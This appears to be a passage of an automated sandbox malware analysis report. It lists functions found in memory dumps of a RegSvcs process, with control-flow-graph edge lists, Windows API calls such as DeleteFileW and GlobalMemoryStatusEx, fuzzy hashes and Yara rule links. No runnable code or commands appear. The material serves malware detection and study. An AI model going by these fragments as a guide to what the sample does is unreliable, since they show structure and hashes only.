                                                                        control_flow_graph 729 de8f4f-de8f9a 731 de8f9c-de8f9f 729->731 732 de8fa2-de8fcd DeleteFileW 729->732 731->732 733 de8fcf-de8fd5 732->733 734 de8fd6-de8ffe 732->734 733->734
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00DE8FC0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: c3b2769651ab89831d1563c6f5a9980f72346b7d3782aaa38104b7e8b6885e0b
                                                                        • Instruction ID: def0de513c3e10933a763bd20996836ac9a0c851c69a8d36af4868e0c5bddede
                                                                        • Opcode Fuzzy Hash: c3b2769651ab89831d1563c6f5a9980f72346b7d3782aaa38104b7e8b6885e0b
                                                                        • Instruction Fuzzy Hash: 511130B2C0065A8FDB10DF9AC5447AEFBB4BF48320F14852AD818B7640D738AA40CFA4
                                                                        Function 00DEF7D8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 737 def7d8-def84c GlobalMemoryStatusEx 739 def84e-def854 737->739 740 def855-def87d 737->740 739->740
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00DEF83F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: 5b3ca641e05a8af5ba42a6449b0498053f2f0103281248483fc3e9578c232123
                                                                        • Instruction ID: 886d33c0ab4a1ea9d6c84c575e4bc0e1a50a5dd30a94e38ce23558b2cbd6bdcb
                                                                        • Opcode Fuzzy Hash: 5b3ca641e05a8af5ba42a6449b0498053f2f0103281248483fc3e9578c232123
                                                                        • Instruction Fuzzy Hash: 9C1120B1C0065A9FDB10DF9AC444BDEFBF8BF48320F14812AD918A7240D378A940CFA5
                                                                        Function 0663FE82 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1693 663fe82-663feae 1706 663feb1 call def268 1693->1706 1707 663feb1 call def260 1693->1707 1694 663feb7-663fed6 1698 663fede-663ff08 1694->1698 1701 663ff0a-663ff27 1698->1701 1702 663ff29 1698->1702 1703 663ff3b-663ff42 1701->1703 1702->1703 1706->1694 1707->1694
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810
                                                                        • Opcode ID: ccf7741a5f46eb6b9efa2de9f0da291ba6079ff0b760929d17ee811ccc9babaf
                                                                        • Instruction ID: 6f319ff18cb280f0a6a12da656929d774ff19ab1ae5b5516c5898b387c12031e
                                                                        • Opcode Fuzzy Hash: ccf7741a5f46eb6b9efa2de9f0da291ba6079ff0b760929d17ee811ccc9babaf
                                                                        • Instruction Fuzzy Hash: 3911AC75B102209FCB549B78C805BAEBBF1EF4C610F00446EE90AE73A0DB35A901CB90
                                                                        Function 0663FE90 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1708 663fe90-663feae 1709 663feb7-663fed6 1708->1709 1721 663feb1 call def268 1708->1721 1722 663feb1 call def260 1708->1722 1713 663fede-663ff08 1709->1713 1716 663ff0a-663ff27 1713->1716 1717 663ff29 1713->1717 1718 663ff3b-663ff42 1716->1718 1717->1718 1721->1709 1722->1709
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810
                                                                        • Opcode ID: 58f01acbffe8ceab275780b0540a02c91c74554536bc9e81f8e889b9d0158cd5
                                                                        • Instruction ID: 96d965577c677506ab0974e6b4157dcb2035c7af1c5234b30c76f0f1cdee26e1
                                                                        • Opcode Fuzzy Hash: 58f01acbffe8ceab275780b0540a02c91c74554536bc9e81f8e889b9d0158cd5
                                                                        • Instruction Fuzzy Hash: F8114C75B102249FDB54AB788804B6E7BF5AF8C600F10446AE90AE73A0DB359901CB94
                                                                        Function 0663EDD0 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1723 663edd0-663edd4 1724 663edd6-663edfc 1723->1724 1725 663edfd-663edff 1723->1725 1724->1725 1726 663ee00-663ee03 1725->1726 1728 663f06a-663f06d 1726->1728 1729 663ee09 1726->1729 1730 663f090-663f092 1728->1730 1731 663f06f-663f08b 1728->1731 1734 663ee13-663ee30 1729->1734 1732 663f094 1730->1732 1733 663f099-663f09c 1730->1733 1731->1730 1732->1733 1733->1726 1735 663f0a2-663f0ab 1733->1735 1740 663ee32-663ee35 1734->1740 1741 663ee3a-663ee59 1734->1741 1740->1735 1744 663ee63-663ef12 1741->1744 1745 663ee5b-663ee5e 1741->1745 1752 663f030-663f04f 1744->1752 1753 663ef18-663ef59 1744->1753 1745->1735 1752->1728 1757 663f003-663f02a 1753->1757 1758 663ef5f-663ef67 1753->1758 1757->1752 1757->1753 1759 663ef75 1758->1759 1760 663ef69-663ef73 1758->1760 1762 663ef7a-663ef7c 1759->1762 1760->1762 1763 663ef9a-663efe7 1762->1763 1764 663ef7e-663ef83 1762->1764 1771 663efee-663effd 1763->1771 1766 663ef91 1764->1766 1767 663ef85-663ef8f 1764->1767 1769 663ef96-663ef98 1766->1769 1767->1769 1769->1763 1769->1771 1771->1757 1771->1758
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: a
                                                                        • API String ID: 0-3904355907
                                                                        • Opcode ID: 9eed2e21402720ba59a57905b655c64e1d189fc5d456bb21d783decde8e787f3
                                                                        • Instruction ID: 4a0dca58c1d0cc5b21fd9ca9337720dbee2a01d9d2de9b344c4e39fb2a09a6a4
                                                                        • Opcode Fuzzy Hash: 9eed2e21402720ba59a57905b655c64e1d189fc5d456bb21d783decde8e787f3
                                                                        • Instruction Fuzzy Hash: 9F014C32F151A48BEF118279DC517EB7FA5CB85230F2441BBD845DF642D6229C5387D2
                                                                        Function 0663CEF8 Relevance: .8, Instructions: 801COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2622 663cef8-663cf13 2623 663cf15-663cf18 2622->2623 2624 663cf61-663cf64 2623->2624 2625 663cf1a-663cf29 2623->2625 2626 663cf66-663cf6b 2624->2626 2627 663cf6e-663cf71 2624->2627 2628 663cf2b-663cf30 2625->2628 2629 663cf38-663cf44 2625->2629 2626->2627 2630 663cf73-663cfb5 2627->2630 2631 663cfba-663cfbd 2627->2631 2628->2629 2632 663d915-663d94e 2629->2632 2633 663cf4a-663cf5c 2629->2633 2630->2631 2634 663d006-663d009 2631->2634 2635 663cfbf-663cfce 2631->2635 2646 663d950-663d953 2632->2646 2633->2624 2638 663d052-663d055 2634->2638 2639 663d00b-663d04d 2634->2639 2641 663cfd0-663cfd5 2635->2641 2642 663cfdd-663cfe9 2635->2642 2643 663d3e4-663d3f0 2638->2643 2644 663d05b-663d05e 2638->2644 2639->2638 2641->2642 2642->2632 2645 663cfef-663d001 2642->2645 2643->2635 2653 663d3f6-663d6e3 2643->2653 2647 663d060-663d0a2 2644->2647 2648 663d0a7-663d0aa 2644->2648 2645->2634 2649 663d976-663d979 2646->2649 2650 663d955-663d971 2646->2650 2647->2648 2657 663d0c7-663d0ca 2648->2657 2658 663d0ac-663d0c2 2648->2658 2655 663d97b-663d9a7 2649->2655 2656 663d9ac-663d9af 2649->2656 2650->2649 2834 663d90a-663d914 2653->2834 2835 663d6e9-663d6ef 2653->2835 2655->2656 2665 663d9b1 2656->2665 2666 663d9be-663d9c0 2656->2666 2660 663d0d9-663d0dc 2657->2660 2661 663d0cc-663d0ce 2657->2661 2658->2657 2673 663d125-663d128 2660->2673 2674 663d0de-663d120 2660->2674 2671 663d3e1 2661->2671 2672 663d0d4 2661->2672 2881 663d9b1 call 663da80 2665->2881 2882 663d9b1 call 663da6d 2665->2882 2668 663d9c2 2666->2668 2669 663d9c7-663d9ca 2666->2669 2668->2669 2669->2646 2675 663d9cc-663d9db 2669->2675 2671->2643 2672->2660 2677 663d137-663d13a 2673->2677 2678 663d12a-663d12c 2673->2678 2674->2673 2701 663da42-663da57 2675->2701 2702 663d9dd-663da40 call 6636138 2675->2702 2687 663d183-663d186 2677->2687 2688 663d13c-663d17e 2677->2688 2685 663d132 2678->2685 2686 663d29f-663d2a8 2678->2686 2682 663d9b7-663d9b9 2682->2666 2685->2677 2695 663d2b7-663d2c3 2686->2695 2696 663d2aa-663d2af 2686->2696 2691 663d188-663d1ca 2687->2691 2692 663d1cf-663d1d2 2687->2692 2688->2687 2691->2692 2705 663d1d4-663d216 2692->2705 2706 663d21b-663d21e 2692->2706 2699 663d3d4-663d3d9 2695->2699 2700 663d2c9-663d2dd 2695->2700 2696->2695 2699->2671 2700->2671 2727 663d2e3-663d2f5 2700->2727 2702->2701 2705->2706 2712 663d241-663d244 2706->2712 2713 663d220-663d23c 2706->2713 2714 663d246-663d288 2712->2714 2715 663d28d-663d28f 2712->2715 2713->2712 2714->2715 2725 663d291 2715->2725 2726 663d296-663d299 2715->2726 2725->2726 2726->2623 2726->2686 2743 663d2f7-663d2fd 2727->2743 2744 663d319-663d31b 2727->2744 2749 663d301-663d30d 2743->2749 2750 663d2ff 2743->2750 2748 663d325-663d331 2744->2748 2760 663d333-663d33d 2748->2760 2761 663d33f 2748->2761 2755 663d30f-663d317 2749->2755 2750->2755 2755->2748 2766 663d344-663d346 2760->2766 2761->2766 2766->2671 2768 663d34c-663d368 call 6636138 2766->2768 2778 663d377-663d383 2768->2778 2779 663d36a-663d36f 2768->2779 2778->2699 2781 663d385-663d3d2 2778->2781 2779->2778 2781->2671 2836 663d6f1-663d6f6 2835->2836 2837 663d6fe-663d707 2835->2837 2836->2837 2837->2632 2838 663d70d-663d720 2837->2838 2840 663d726-663d72c 2838->2840 2841 663d8fa-663d904 2838->2841 2842 663d73b-663d744 2840->2842 2843 663d72e-663d733 2840->2843 2841->2834 2841->2835 2842->2632 2844 663d74a-663d76b 2842->2844 2843->2842 2847 663d77a-663d783 2844->2847 2848 663d76d-663d772 2844->2848 2847->2632 2849 663d789-663d7a6 2847->2849 2848->2847 2849->2841 2852 663d7ac-663d7b2 2849->2852 2852->2632 2853 663d7b8-663d7d1 2852->2853 2855 663d7d7-663d7fe 2853->2855 2856 663d8ed-663d8f4 2853->2856 2855->2632 2859 663d804-663d80e 2855->2859 2856->2841 2856->2852 2859->2632 2860 663d814-663d82b 2859->2860 2862 663d83a-663d855 2860->2862 2863 663d82d-663d838 2860->2863 2862->2856 2868 663d85b-663d874 call 6636138 2862->2868 2863->2862 2872 663d883-663d88c 2868->2872 2873 663d876-663d87b 2868->2873 2872->2632 2874 663d892-663d8e6 2872->2874 2873->2872 2874->2856 2881->2682 2882->2682
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0082dbe427963d7503192eac1c31370d91d232c67758ba2a27d091628cab308
                                                                        • Instruction ID: e4e6ff42cfc9724128b83dca7514e143d41c396819d8344358b64057bc78ed3a
                                                                        • Opcode Fuzzy Hash: d0082dbe427963d7503192eac1c31370d91d232c67758ba2a27d091628cab308
                                                                        • Instruction Fuzzy Hash: 4C624B30A0061ACFDB55EB68D590A5DB7F2FF84300F248A69D4059F369DB75ED8ACB80
                                                                        Function 0663DD00 Relevance: .4, Instructions: 425COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2c4c17e55c430f89f920038af17f3e16e1dd8fe14c63c8b770f71ca49a04ad0
                                                                        • Instruction ID: 5b76251a13621fb55aaefdab9e98987a4839567e53bc5d4640c546a40efd0a49
                                                                        • Opcode Fuzzy Hash: b2c4c17e55c430f89f920038af17f3e16e1dd8fe14c63c8b770f71ca49a04ad0
                                                                        • Instruction Fuzzy Hash: 09F16134E002198FDB54DBA8D990BADB7B2FF89300F20852AE405EB355DB75ED46CB91
                                                                        Function 0663AC70 Relevance: .4, Instructions: 391COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 282f0f04647abcdc9441a34bbae61185f6f287e92580f5c3e9901586b404c45c
                                                                        • Instruction ID: eeed0f8eaa4bad8ac1d8d73b22cf75fa7dd6565f8c3570466dadfccb1aca118f
                                                                        • Opcode Fuzzy Hash: 282f0f04647abcdc9441a34bbae61185f6f287e92580f5c3e9901586b404c45c
                                                                        • Instruction Fuzzy Hash: 74E17134E1025A8FDB59DFA8D8846AEB7F2FF85300F20852AD406DB355DB74D846CB90
                                                                        Function 0663B1CA Relevance: .3, Instructions: 297COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 295588b72984c03b31406aefb54e0569b3658b269badf16894631f871c43d7ed
                                                                        • Instruction ID: c8376dffe34f3d0384ae015626fa3f775339283997b8fe24d03253da490ee7b1
                                                                        • Opcode Fuzzy Hash: 295588b72984c03b31406aefb54e0569b3658b269badf16894631f871c43d7ed
                                                                        • Instruction Fuzzy Hash: 5DA1B634F101298FEF64DA6CC490BBE77E6FB99310F244526E505EB396CA34DC818791
                                                                        Function 0663B5E0 Relevance: .3, Instructions: 269COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8cacd8d32a5d53304e2234e848b67475d407f36e09fb430949797c75ba874f3
                                                                        • Instruction ID: a5d721c5c047d02b49832ab1adc44738f602631ed5ef5e22815541a7d6f2e0b2
                                                                        • Opcode Fuzzy Hash: d8cacd8d32a5d53304e2234e848b67475d407f36e09fb430949797c75ba874f3
                                                                        • Instruction Fuzzy Hash: 0CA14B34E002298FDFA4CF68D4807ADB7B1EB9A310F24896AE455DB391DB34ED85CB51
                                                                        Function 066390F0 Relevance: .2, Instructions: 230COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9c6444e7cf6e34193f4b737b9c52998aa11e6a8bf7b8bd56a295153b4578b99
                                                                        • Instruction ID: c0dc2241124380e04b13b13f60e80a61e5f1bab2d0ebc3cd308bdb378accae27
                                                                        • Opcode Fuzzy Hash: c9c6444e7cf6e34193f4b737b9c52998aa11e6a8bf7b8bd56a295153b4578b99
                                                                        • Instruction Fuzzy Hash: 9C913F35B1125A8FDB54DB75D890BAEB3F6AF88300F10856AD80AEB344EF709D458F91
                                                                        Function 06635D88 Relevance: .2, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0a665eb8b63adbf0dafda61b226a620b94708f0e1f82835cefac92a55a47da25
                                                                        • Instruction ID: 50420f8bbb24350e1a5db32ccdb45fa1f68c77aba62416a7a9e1ddb6b701f1b4
                                                                        • Opcode Fuzzy Hash: 0a665eb8b63adbf0dafda61b226a620b94708f0e1f82835cefac92a55a47da25
                                                                        • Instruction Fuzzy Hash: 3761C271F005214BDF54AA7ECC84A6FBAD7EFC4610B25443AE80ADB3A4DEA5DD0287C5
                                                                        Function 06633E51 Relevance: .2, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ba4c043879359cd7de2c3de149adf3e744a44987178627c434f6bb68760141a
                                                                        • Instruction ID: b1b1ce558f38bbb0d8526ca8b7ebc77123397c961aff7b8908b75277b6f1c6b7
                                                                        • Opcode Fuzzy Hash: 4ba4c043879359cd7de2c3de149adf3e744a44987178627c434f6bb68760141a
                                                                        • Instruction Fuzzy Hash: 24812D34B1165A8FDF54DBA8D4947AEB7F2AF89300F108429E40AEB394EB35DC468B51
                                                                        Function 06634174 Relevance: .2, Instructions: 222COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdc98d0060083929558cfd27434da4fad8ad7a250588de23195d8ed93dcd384c
                                                                        • Instruction ID: 7e5cd08a8a530c775d01ea6a5ecbd973f9aa92485aa576b8a0d92d2c51e51250
                                                                        • Opcode Fuzzy Hash: cdc98d0060083929558cfd27434da4fad8ad7a250588de23195d8ed93dcd384c
                                                                        • Instruction Fuzzy Hash: 60913C30E106198BDF60DF68C890B9DF7B1FF89310F208695D549BB355DB71AA86CB90
                                                                        Function 06633E60 Relevance: .2, Instructions: 218COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7f9cd6f5772d6dae82380be26ae8921e115e658e0768dc4117387cf780e3b07
                                                                        • Instruction ID: 1c8873554980d2154c80277d4a2cab871cee037f7862b307abd324c30f28efc5
                                                                        • Opcode Fuzzy Hash: b7f9cd6f5772d6dae82380be26ae8921e115e658e0768dc4117387cf780e3b07
                                                                        • Instruction Fuzzy Hash: C8811B34B1165A8FDF54DBA8D4947AEB7F2AF89300F108429E40AEB394EF35DC428B51
                                                                        Function 06634188 Relevance: .2, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1f6afe9a0eb945e0e1da6a9031f34266c99956b45d3b5630658a76df45c38ff
                                                                        • Instruction ID: 271650e25eafcfaab488a90437b591b3607a47962937f184c2d3e1d4a92d2772
                                                                        • Opcode Fuzzy Hash: b1f6afe9a0eb945e0e1da6a9031f34266c99956b45d3b5630658a76df45c38ff
                                                                        • Instruction Fuzzy Hash: 8E91FC30E1061A8BDF60DF68C890B9DF7B1FF89310F208599D549BB355DB71AA868F90
                                                                        Function 0663EAB9 Relevance: .2, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 276daa33700287d13f7e7d55b038280dd339a755222c9b3c9748e2e4ba7045c6
                                                                        • Instruction ID: edd00c8e97937abd37841fb444f3de174c8df54a0e56bfd591c5877092f17a57
                                                                        • Opcode Fuzzy Hash: 276daa33700287d13f7e7d55b038280dd339a755222c9b3c9748e2e4ba7045c6
                                                                        • Instruction Fuzzy Hash: EF715E30A006199FDB54DFA9D980AADBBF6FF84310F14846AE016EB355DB31ED46CB50
                                                                        Function 0663EAC8 Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9efed3061b64ed3b8ccb8add8a0de76c30b44647bafe7557b480d88c0e3bce1b
                                                                        • Instruction ID: a77c1cc303afa2289eec8a293bdbc43289e77e992350e553028e6d21b3979e9b
                                                                        • Opcode Fuzzy Hash: 9efed3061b64ed3b8ccb8add8a0de76c30b44647bafe7557b480d88c0e3bce1b
                                                                        • Instruction Fuzzy Hash: E2714D30A006199FDB54DFA9D980AADBBF6FF84300F14846AE016EB355DB71ED46CB50
                                                                        Function 0663EDE0 Relevance: .2, Instructions: 200COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5dc04b4b2f6b576c7fff49c82f0452f9551e9cfcfae15e7c8033d261540519af
                                                                        • Instruction ID: 6ba96b7824a3e206fb3d33216cca502f81591b159342f94353197717b341d102
                                                                        • Opcode Fuzzy Hash: 5dc04b4b2f6b576c7fff49c82f0452f9551e9cfcfae15e7c8033d261540519af
                                                                        • Instruction Fuzzy Hash: F6715231E1031A8FDB14DFA5C4546AEB7F2FF88300F10866AD405AB355EBB1E986CB90
                                                                        Function 0663DCF1 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4afe1c0aff7a990a5425af5beb5d391f4fa9fccd6bc9b9c1e4e775c50a5838e8
                                                                        • Instruction ID: 3ebd0fd8e9fae53fb04c48efb491a708b188c05313c7fd77ba168de26aa37ebe
                                                                        • Opcode Fuzzy Hash: 4afe1c0aff7a990a5425af5beb5d391f4fa9fccd6bc9b9c1e4e775c50a5838e8
                                                                        • Instruction Fuzzy Hash: EB717270E102198FDF54DBA8D880BADB7B6EF89310F208526E405EB395DB75DC81CB91
                                                                        Function 06634720 Relevance: .2, Instructions: 186COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52477962bc4ec0178a266d9693655481d64b43380b6a3f8063d181e3f3ab756c
                                                                        • Instruction ID: b92da91f0a66a80ba5a5576a7f596bfeb111fc571b0a69479ad2890be214978d
                                                                        • Opcode Fuzzy Hash: 52477962bc4ec0178a266d9693655481d64b43380b6a3f8063d181e3f3ab756c
                                                                        • Instruction Fuzzy Hash: FE617130F002199FDF549FA4C855BAEBBF6EB88700F20842AE105EB395DF758C458B90
                                                                        Function 0663FC20 Relevance: .2, Instructions: 175COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee2842b35c8a37ec48e537115e0bfbc5f148f9707829f53e7bc5b268f5c468ce
                                                                        • Instruction ID: ce46b14311f3fa0a8563eaa0b0ffb6c12712ecac7eeec13804af5c1e0b613082
                                                                        • Opcode Fuzzy Hash: ee2842b35c8a37ec48e537115e0bfbc5f148f9707829f53e7bc5b268f5c468ce
                                                                        • Instruction Fuzzy Hash: C451D131E00219DFDF14AB78E8487ADB7B2FF88315F20886AE506D7361DB358955CB90
                                                                        Function 0663F5C8 Relevance: .2, Instructions: 170COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2461f1c38bea6f14943bcb693bf149ae0bf9137f6fc1fe843168d5b64f08f8e
                                                                        • Instruction ID: 6d6690b8f5fb5c2287d34ab42a095ed97be148d2d92676ce1e08b075ea5c33b0
                                                                        • Opcode Fuzzy Hash: d2461f1c38bea6f14943bcb693bf149ae0bf9137f6fc1fe843168d5b64f08f8e
                                                                        • Instruction Fuzzy Hash: C051C534F202659FEF64666CD89477F3A6ED789310F20443AE50AD73A6CA7CDC4183A2
                                                                        Function 0663F5D8 Relevance: .2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
